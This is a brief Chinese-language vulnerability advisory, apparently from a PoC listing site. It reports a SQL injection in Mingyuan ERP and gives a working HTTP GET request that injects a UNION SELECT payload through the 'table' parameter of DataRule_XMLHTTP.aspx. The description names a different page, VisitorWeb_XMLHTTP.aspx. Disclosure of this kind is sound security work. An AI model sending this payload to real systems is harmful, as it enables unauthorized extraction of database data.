明源ERP DataRule_XMLHTTP 存在SQL注入漏洞

2025-07-18 HTTP PoC Public

Description

明源ERP VisitorWeb_XMLHTTP.aspx 存在SQL注入漏洞,攻击者进而利用此漏洞获取数据库敏感信息。

PoC

GET /BUAdjust/DataRule/DataRule_XMLHTTP.aspx/?ywtype=getFieldXML&table=-1%27%20union%20select%20@@version-- HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities